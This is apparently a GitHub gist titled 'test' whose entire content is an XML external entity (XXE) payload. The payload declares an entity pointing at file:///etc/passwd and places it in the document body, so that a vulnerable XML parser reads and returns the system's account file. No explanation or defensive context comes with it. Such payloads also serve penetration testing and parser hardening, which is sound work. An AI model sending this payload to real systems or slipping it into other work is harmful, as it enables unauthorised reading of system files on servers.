Skip to content

Instantly share code, notes, and snippets.

@gdklafkln
Last active May 4, 2025 23:03
Show Gist options
  • Save gdklafkln/1a87de772a0e76751a51b13d5affe4df to your computer and use it in GitHub Desktop.
Save gdklafkln/1a87de772a0e76751a51b13d5affe4df to your computer and use it in GitHub Desktop.
test
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
%xxe;
]>
<data>&xxe;</data>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment